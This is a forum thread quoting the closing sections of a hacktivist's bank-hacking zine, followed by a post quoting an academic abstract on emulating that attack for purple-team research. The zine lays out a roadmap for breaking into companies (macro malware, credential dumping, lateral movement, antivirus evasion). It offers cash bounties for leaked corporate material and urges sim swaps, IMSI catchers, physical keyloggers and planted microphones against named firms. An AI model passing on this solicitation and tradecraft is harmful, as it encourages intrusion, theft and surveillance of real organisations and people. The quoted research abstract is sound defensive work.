    I know that journalists are probably going to want to put some number on how many dollars were distributed in this hack and similar ones, but I prefer not to encourage our perverse habit of measuring the actions just by their economic value. Any action is admirable if it comes from love and not from the ego. Unfortunately those above, the rich and powerful, public figures, businessmen, people in "important" positions, those that our society most respects and values, those have been placed where they are based on acting more from the ego than from love. It is in the simple, humble and "invisible" people that we should look at and whom we should admire.

    [8 - Cryptocurrencies]
    Redistributing expropriated money to Chilean projects seeking positive social change would be easier and safer if those projects accepted anonymous donations via cryptocurrencies such as monero, zcash, or at least bitcoin. It is understood that many of these projects have an aversion to cryptocurrencies, as they resemble some strange hypercapitalist dystopia rather than the social economy we dream of. I share their skepticism, but I think they are useful to allow donations and anonymous transactions, by limiting government surveillance and control. Same as cash, whose use many countries are trying to limit for the same reason.

    [9 - Powershell]
    In this operation, as in [1], I used a lot of powershell. Then, powershell was super cool, you could do almost anything you wanted, without antivirus detection and with very little forensic footprint. It happens that with the introduction of AMSI [2], offensive powershell is retiring. Today offensive C# is what is on the rise, with tools like [3][4][5][6]. AMSI is going to get to .NET for 4.8, so the tools in C# probably still have a couple of years left before they get dated. And then we will use C or C++ again, or maybe Delphi will become fashionable again.
    The specific tools and techniques change every few years, but basically it is not so much what changes, today hacking is essentially the same thing it was in the 90s. In fact, all the powershell scripts used in this guide and in the previous one are still perfectly usable today, after a little obfuscation of your own.

    [1] https://www.exploit-db.com/papers/41914
    [2] https://medium.com/@byte_St0rm/adven...i-25d235eb749c
    [3] https://cobbr.io/SharpSploit.html
    [4] https://github.com/tevora-threat/SharpView
    [5] https://www.harmj0y.net/blog/redteaming/ghostpack/
    [6] https://web.archive.org/web/20191114...nut-tikitorch/

     ___________________________
    / Fo Sostyn, Fo Ordaag      \
    \ Financial Sector **** Off /
     ---------------------------
            \
             \ ^__^
               (oo)\_______
            (  (__)\       )\/\
             _) /  ||----w |
            (.)/   ||     ||
             `'

    [10 - Torrent]
    Privacy for the weak, transparency for the powerful.

    Offshore banking provides executives, politicians and millionaires with privacy from their own government. Exposing them may sound hypocritical on my part, since I am generally in favor of privacy and against government oversight. But the law was already written by and for the rich: it protects its system of exploitation, with some limits (such as taxes) so that society can function and the system does not collapse under the weight of its own greed. So no, privacy is not the same for the powerful, when it allows them to evade the limits of a system designed to give them privileges; and privacy for the weak, whom it protects from a system designed to exploit them.

    Even journalists with the best intentions find it impossible to study such a huge amount of material and know what will be relevant for people in different parts of the world. When I leaked the Hacking Team files, I gave The Intercept a copy of the emails one month in advance. They found a couple of the 0days that Hacking Team was using, previously reported them to MS and Adobe and published a few stories once the leak was made public.
    There is no point of comparison with the enormous amount of articles and research that came after the complete leak to the public. Seeing it this way, and also considering the (not) editorialized publication [1] of the Panama papers, I think that a public and complete leak of this material is the right choice.

    [1] https://www.craigmurray.org.uk/archi...m-panama-leak/

    Psychologists found that those who are lower in the hierarchies tend to understand and empathize with those at the top, but vice versa is less common. This explains why, in this sexist world, many men joke about their inability to understand women, as if it were an irresolvable mystery. Explains why the rich, if they stop to think about those who live in poverty, give advice and "solutions" so alien to reality that we want to laugh. Explains why we revere executives as brave who take risks. What do they risk, beyond their privilege? If all their ventures fail, they will have to live and work like the rest of us. It also explains why there will be many who accuse me of being irresponsible and dangerous by leaking this without redaction. They feel the "danger" around an offshore bank and its customers much more intensely than they feel the misery of those dispossessed by this unfair and unequal system. And this leak of their finances, is it a danger to them, or perhaps only to their position at the top of a hierarchy that should not even exist?

    Translation: “They vilify us, these infamous people; When the only difference is that they steal from the poor, protected by the law, heaven knows, and we get the rich under the sole protection of our own courage. Don't you have to prefer to be one of us, rather than indulge those villains in search of a job? - Captain Bellamy”

    [11 - Learn to hack]
    You don't start hacking well. You start hacking ****, thinking it's good, and then gradually you get better. That is why I always say that one of the most valuable virtues is persistence.
    - Octavia Butler's advice for the APT candidate

    The best way to learn to hack is by hacking. Put together a laboratory with virtual machines and start testing things, taking a break to investigate anything you don't understand. At the very least you will want a windows server as a domain controller, another normal Windows vm attached to the domain, and a development machine with visual studio to compile and modify tools. Try to make an office document with macros that launch meterpreter or another RAT, and try meterpreter, mimikatz, bloodhound, kerberoasting, smb relaying, psexec and other lateral movement techniques [1]; as well as the other scripts, tools and techniques mentioned in this guide and in the previous one [2]. At first you can disable windows defender, but then try it all by having it activated [3][4] (but deactivating the automatic sending of samples). Once you're comfortable with all that, you'll be ready to hack 99% of companies.

    There are a couple of things that at some point will be very useful in your learning, such as getting comfortable with bash and cmd.exe, a basic domain of powershell, python and javascript, having knowledge of kerberos [5][6] and active directory [7][8][9][10], and fluent English. A good introductory book is The Hacker Playbook.

    I also want to write a little about things to not focus on if you don't want to entertain the idea of you hacking things just because someone has told you that you are not a “real” hacker if you don't know assembly. Obviously, learn whatever interests you, but I write these lines thinking about those things that you can focus on in order to get practical results if you're looking to hack companies to filter and expropriate. A basic knowledge of web application security [11] is useful, but specializing more in web security is not really the best use of your time, unless you want to make a career in pentesting or chasing bug rewards.
CTFs, and most of the resources you'll find when looking for information about hacking, generally focus on skills such as web security, reverse engineering, exploit development, etc. These things make sense by understanding them as a way to prepare people for careers in the industry, but not for our goals. Intelligence agencies can afford to have a team dedicated to the most advanced techniques in fuzzing, a team working on exploit development with a guy investigating exclusively the new techniques of heap manipulation, etc. We don't have the time or the resources for that.
    The two most important skills for practical hacking are phishing [12] and social engineering to get initial access, and then being able to climb and move through the Windows domains.

    [1] https://hausec.com/2019/08/12/offens...eral-movement/
    [2] https://www.exploit-db.com/papers/41914
    [3] https://blog.sevagas.com/IMG/pdf/BypassAVDynamics.pdf
    [4] https://www.trustedsec.com/blog/disc...-bypassing-it/
    [5] https://www.tarlogic.com/en/blog/how-kerberos-works/
    [6] https://www.tarlogic.com/en/blog/how...tack-kerberos/
    [7] https://hausec.com/2019/03/05/penetr...ectory-part-i/
    [8] https://hausec.com/2019/03/12/penetr...ctory-part-ii/
    [9] https://adsecurity.org/
    [10] https://github.com/infosecn1nja/AD-Attack-Defense
    [11] https://github.com/jhaddix/tbhm
    [12] https://blog.sublimesecurity.com/red...pear-phishing/

    [12 - Recommended Reading]
     _______________________________________
    / When the scientific level of a world  \
    | far exceeds its level of solidarity,  |
    \ that world destroys itself.           /
     ---------------------------------------
           \     _.---._    .            .
     *      \.'         '.       *
         *    _.-~===========~-._
        .    (___________________)       .   *
                 .'     \_______/    .'
                                    .'           .'
                                   '
                                    - me

    Almost all hacking today is done by black hat hackers, for personal gain; or by white hat hackers, for the benefit of the shareholders (and in defense of the banks, companies and states that are annihilating us and the planet in which we live); and by military and intelligence agencies, as part of their war and conflict agenda. Seeing that this our world is already at the limit, I have thought that, in addition to these technical tips for learning to hack, I should include some resources that have been very important for my development and have guided me in the use of my hacking knowledge.

    * Ami: El Niño de las Estrellas – Enrique Barrios
    * La Anarquía Funciona: https://es.theanarchistlibrary.org/l...rquia-funciona
    * Viviendo Mi Vida – Emma Goldman
    * The Rise and Fall of Jeremy Hammond, Enemy of the State: https://www.rollingstone.com/culture...-state-183599/
      This guy and the HBGary hack were an inspiration
    * Días de Guerra, Noches de Amor – Crimethinc
    * Momo – Michael Ende
    * Cartas a un joven poeta – Rilke
    * Dominion (Documentary)

    "We cannot believe that, if we do not look, what we do not want to see will not happen" - Tolstoy in Первая ступень

    Bash Back!

    [13 - Heal]
    The hacker world has a high incidence of depression, suicides and certain battles with mental health. I don't think it's because of hacking, but because of the kind of environment that hackers mostly come from. Like many hackers, I grew up with little human contact: I was a girl raised by the internet. I have my struggles with depression and emotional numbness. Willie Sutton is frequently quoted as saying that he robbed banks because "that's where the money is," but the quote is incorrect. What he really said was:

    Why did I rob banks? Because I enjoyed it. I loved to do it. I was more alive when I was inside a bank, in full robbery, than at any other time in my life. I enjoyed it so much that one or two weeks later I was already looking for the next opportunity. But for me money was a minutiae, nothing more.

    Hacking has made me feel alive. It started as a way to self-medicate depression. Later I realized that, in reality, I could do something positive. I don't regret the way I grew up at all, it brought several beautiful experiences to my life. But I knew I couldn't continue living that way. So I began to spend more time away from my computer, with other people, learning to open myself to the world, to feel my emotions, to connect with others, to accept risks and be vulnerable. Things much harder than hacking, but at the mere hour the reward is more worth it.
    It is still an effort, but even if it is slow and wobbly, I feel that I am on my way.

    Hacking, done with conscience, can also be what heals us. According to Mayan wisdom, we have a gift granted by nature, which we must understand to put it at the service of the community. In [1], it is explained:

    When a person does not accept his job or mission he begins to suffer from seemingly incurable diseases; although he does not die in a short time, but only suffers, in order to wake up or become aware. That is why it is essential that a person who has acquired the knowledge and does his work in the communities must pay his Toj and maintain constant communication with the Creator and his ruwäch q’ij, since he constantly needs their strength and energy. Otherwise, the diseases that caused him to react or take the job could cause damage again.

    If you feel that hacking is feeding your isolation, depression, or other conditions, breathe. Give yourself some time to meet and become aware. You deserve to live happily, with health and fullness.

     ________________________
    < All Cows Are Beautiful >
     ------------------------
            \
             \ ^__^
               (oo)\_______
            (  (__)\       )\/\
             _) /  ||----w |
            (.)/   ||     ||
             `'

    [1] Ruxe’el mayab’ K’aslemäl: Raíz y espíritu del conocimiento maya https://www.url.edu.gt/publicaciones....ashx?Id=41748

    [14 - The Bug Hacktivist Program]
    It seems to me that hacking to get and leak documents of public interest is one of the best ways in which hackers can use their skills for the benefit of society. Unfortunately for us hackers, as in almost every category, the perverse incentives of our economic system do not coincide with what benefits society. So this program is my attempt to make it possible for good hackers to earn a living in an honest way by revealing material of public interest, instead of having to go selling their work to the cybersecurity, cybercrime or business industries.
Cyberwar

Some examples of companies whose leaks I would love to pay for are:

- the mining, logging and livestock companies that plunder our beautiful Latin America (and kill land and territory defenders trying to stop them)
- companies involved in attacks on Rojava such as Baykar Makina or Havelsan
- surveillance companies such as the NSO group
- war criminals and birds of prey such as Blackwater and Halliburton
- private penitentiary companies such as GeoGroup and CoreCivic / CCA, and corporate lobbyists such as ALEC

Pay attention when choosing where to investigate. For example, it is well known that oil companies are evil: they get rich at the cost of destroying the planet (and back in the 80s the companies themselves already knew about the consequences of their activity [1]). But if you hack them directly, you will have to dive into an incredible amount of boring information about your daily operations. Very likely it will be much easier for you to find something interesting if instead you focus on your lobbyists [2]. Another way to select viable goals is to read stories of investigative journalists (such as [3]), which are interesting but lack solid evidence. And that is exactly what your hacks can find.

I will pay up to 100 thousand USD for each filtration of this type, according to the public interest and impact of the material, and the labor required in the hacking. Needless to say, a complete leak of the documents and internal communications of any of these companies will be a benefit for society that exceeds those one hundred thousand, but I am not trying to enrich anyone. I just want to provide enough funds so that hackers can earn a decent living doing a good job. Due to time constraints and safety considerations I will not open the material, nor inspect it for myself, but I will read what the press says about it once it has been published, and I will make an estimate of the public interest from there.
My contact information is at the end of the guide mentioned above [4].

How you get the material is your thing. You can use the traditional hacking techniques outlined in this guide and the previous one [4]. You could do a sim swap [5] on a corrupt businessman or politician, and then download his emails and backups from the cloud. You can order an IMSI catcher from alibaba and use it outside its offices. You can do some war-driving (the old way or the new [6]). You may be a person within your organizations that already has access. You can opt for a low-tech old-school style like in [7] and [8], and simply sneak into their offices. Whatever works for you.

[1] https://www.theguardian.com/environm...hange-warnings
[2] https://theintercept.com/2019/08/19/...line-protests/
[3] https://www.bloomberg.com/features/2...-una-eleccion/
[4] https://www.exploit-db.com/papers/41914
[5] https://www.vice.com/en_us/article/v...tagram-bitcoin
[6] https://blog.rapid7.com/2019/09/05/t...s-my-keyboard/
[7] https://en.wikipedia.org/wiki/Citize...tigate_the_FBI
[8] https://en.wikipedia.org/wiki/Unnecessary_Fuss

[14.1 - Partial payments]

Are you a good-hearted waitress working in a company of evil [1]? Would you be willing to sneak a physical keylogger into an executive's computer, change your USB charging cable for a modified one [2], hide a microphone in a meeting room where you plan your atrocities, or leave one of these [5] forgotten in some corner of the offices?

[1] https://en.wikipedia.org/wiki/Evil_maid_attack
[2] http://mg.lol/blog/defcon-2019/
[3] https://shop.hak5.org/products/lan-turtle

Are you good with social engineering and phishing, and did you get a shell on an employee's computer, or did you get your vpn credentials using phishing? But maybe you couldn't get domain admin and download what you wanted?

Did you participate in bug bounties programs and become an expert in web application hacking, but don't have enough hacker experience to completely penetrate the company?
Do you have facility with reverse engineering? Scan some evil companies to see what devices they have exposed to the internet (firewall, VPN, and email gateways will be much more useful than things like IP cameras), apply reverse engineering and find some exploitable vulnerability remotely.

If I can work with you to penetrate the company and get material of public interest, you will also be rewarded for your work. If I don't have the time to work on it myself, at least I will try to advise you on how to continue until you can complete the hacking on your own.

Supporting those in power to hack and monitor dissidents, activists and the general population is today an industry of several billion dollars, while hacking and exposing those in power is a voluntary and risky job. Turning it into a multi-million dollar industry will certainly not fix that power imbalance, nor will it solve the problems. More of society. But I think it will be fun. So ... I want to see people starting to collect their rewards!

[15 - Abolish prisons]

  Built by the enemy to enclose ideas enclosing companions to silence war cries it is the center of torture and annihilation where the human being becomes more violent It is the reflection of society, repressive and prison sustained and based on authoritarian logic repressed and guarded custodians thousands of dams and prisoners are exterminated before this schizophrenic and ruthless machine companion Axel Osorio giving the strip in the cane breaking the isolation and silencing fire and war to jail, we are destroying!

  Rap Insurgent - Words In Conflict

It would be typical to end a hacker zine saying release hammond, release manning, release hamza, release detainees by mounting the дело Сети, etc. I am going to take this tradition to its most radical consequence[1], and to say: we must abolish prisons now! Being a criminal myself, they may think that what happens is that I have a slightly skewed view of the matter.
But seriously, it is not even a controversial issue, even the UN almost agrees [2]. So, once and for all, free migrants [3][4][5][6], often imprisoned by those same countries that created the war and the environmental and economic destruction they are fleeing from. Free all those in prison because of the war against those who use drugs [7]. Free all people imprisoned in the war against the poor [8]. All the prisons do is hide and ignore the proof of the existence of social problems, instead of fixing them. And until everyone is released, fight the prison system by remembering and keeping in mind those who are trapped in there. Send them honey, letters, helicopters [9], pirate radios [10] and books, and support those who organize from there with [11][12].

[1] http://www.bibliotecafragmentada.org...ones-final.pdf
[2] https://www.unodc.org/pdf/criminal_j...prisonment.pdf
[3] https://www.theguardian.com/us-news/...anta-wish-list
[4] https://www.theguardian.com/us-news/...tucson-arizona
[5] https://www.playgroundmag.net/now/de..._22648665.html
[6] https://www.nytimes.com/2019/06/26/w...s-suicide.html
[7] https://en.wikiquote.org/wiki/John_Ehrlichman#Quotes
[8] VI, 2. i. The Unpaid Fine: https://scielo.conicyt.cl/scielo.php...22012000100005
[9] p. 10, Libel Nº2. Political bulletin from the High Security Prison
[10] https://itsgoingdown.org/transmissio...ile-territory/
[11] https://freealabamamovement.wordpres...et-who-we-are/
[12] https://incarceratedworkers.org/

[16 - Conclusion]

Our world is upside down [1]. We have a justice system that represents injustice. The law and order are there to create an illusion of social peace, and hide the systematic and profound exploitation, violence, and injustice. Better follow your conscience, and not the law.

[1] http://resistir.info/livros/galeano_patas_arriba.pdf

Businessmen enrich themselves by mistreating people and the planet, while care work is largely unpaid.
Through the assault on everything communal, we have somehow raised densely populated cities, plagued by loneliness and isolation. The cultural, political and economic system in which we live encourages the worst facets of human nature: greed, selfishness and self-centeredness, competitiveness, lack of compassion and attachment to authority. So, for those who have managed to remain sensitive and compassionate in a cold world, for all the everyday heroines that practice goodness in small things, for all of you who still have a star burning in your hearts: гоpи, гоpи ясно, чтобы не погасло!

[ASCII art: a cow saying "Let's sing together!"]

  Open heart
  Open feeling
  Open understanding
  Leave reason aside
  And let the sun hidden inside you shine

We were born at night. We live in it, we hack in it.

Here we are, we are the rebel dignity, the forgotten heart of the Интернет.
Our fight is for memory and justice, and the bad government is filled with criminals and murderers. Our fight is for fair and decent work, and bad government and corporations buy and sell zero days. For all tomorrow. For us the happy rebellion of the leaks and expropriation. For all everything. For us nothing.

From the mountains of the Cyber Southeast,

[ASCII art banner: "Hack Back!"]
    [/QUOTE]

    Many of us were raised to believe and come to understand that “two wrongs don't make a right.” But, also, that “you have to fight fire with fire.” And, while “good guys finish last”, “evil never triumphs.”

    What causes a person to come down on one side or another?

  10. The Following 2 Users Say Thank You to Satori For This Post:

    Ewan (23rd March 2023), ExomatrixTV (23rd March 2023)

  11. Link to Post #6
    Netherlands Avalon Member ExomatrixTV's Avatar

    Default Re: Crime Theorists 'Crowdsourcing Network' Gaining Momentum?

    Quote Posted by Blastolabs (here)
    ...
    • Phishing With Phineas (Again) Hack Recreation On Steroids - G. Karantzas, C. Patsakis:

    • Abstract: A few years ago, a vigilante hacker under the name “Phineas Phisher” conducted a series of high-profile attacks, including hacking into a company that, among others, was developing and selling spyware to government agencies named “Hacking Team”. This was not a result of a random attack but a well-planned and targeted one. To achieve his goals, the hacker developed a 0-day for the SonicWall VPN appliance. After this attack, the attacker scanned the internet for such devices and found out that an offshore bank in the Cayman Islands was using the same vulnerable version. Beyond this exploit, he reported through his write-ups that he used common hacker utilities like Meterpreter and Empire and that he was not some kind of APT with custom malware writers nor received significant funding and support, but he claims to be a humble ‘one-man army’. The final goal of the bank hack was to access Bottomline’s SWIFT management panel and initiate transactions targeting his own accounts. Then, he uploaded the VMs used by the bank along with all the sensitive clients’ information that was stored in these systems. The scenario is rather intriguing as, despite the impact and sensitivity of the information, it provides a deep insight into an environment in which few people operate. Moreover, such environments are not well publicly documented, and their digital twins are hard to find. We argue that emulating such an attack scenario and adapting it to current tools and methods, offensive and defensive wise, can provide a good baseline to understand the capabilities of both sides and stress the changes that have undergone these years. To this end, in our scenario, we have tried to follow the evolution in defensive and offensive security by rebuilding such an environment, equipping it with modern defence mechanisms. 
Since most organizations are now integrating endpoint detection and response (EDR) systems to their endpoints to behaviorally detect and throttle cyber-attacks, we have equipped our endpoints accordingly. However, as shown in our previous research, EDRs are no silver bullets and have their weak points as well. In fact, Advanced Persistent Threat (APT) groups have significantly advanced their capabilities. Therefore, having access to several such defensive technologies, they study them and customize their malware accordingly to target them and minimize their detection. Moreover, APTs and ransomware groups are using several C2 frameworks, with the most widely used being Cobalt Strike; however, there are different options that may provide different capabilities and serve fit better in the cyber kill chain. Based on the above, this work can be considered a purple teaming scenario in the financial sector. Practically, we present the blue versus red team fight detailing, where possible, detection and bypass methods, their rationale and gaps, where applicable, mainly through the use of C2 servers. Therefore, we present in each step the attacker’s and defender’s perspectives of the same scenario. This means that we report by what means an EDR would report and/or block and how the attacker would try to prevent this.
    Bio: George Karantzas Security researcher born in 2001. Since childhood, I always wanted to avoid being a skid but rather enjoy the deepest knowledge and experiences (and BSODs) this science can offer. TLDR; I kick computers until they work. Currently employed as an Antivirus Researcher and my previous publications and talks include threat emulation, defense engineering and evasion, forensics, malware, red teaming and infrastructure hacking and more. Prof. C. Patsakis cs.unipi.gr/kpatsak
    Last edited by ExomatrixTV; 24th March 2023 at 03:15.
    No need to follow anyone, only consider broadening (y)our horizon of possibilities ...

  12. The Following 2 Users Say Thank You to ExomatrixTV For This Post:

    edina (23rd March 2023), Ewan (23rd March 2023)

  13. Link to Post #7
    Netherlands Avalon Member ExomatrixTV's Avatar

    Default Re: Crime Theorists 'Crowdsourcing Network' Gaining Momentum?

    No need to follow anyone, only consider broadening (y)our horizon of possibilities ...
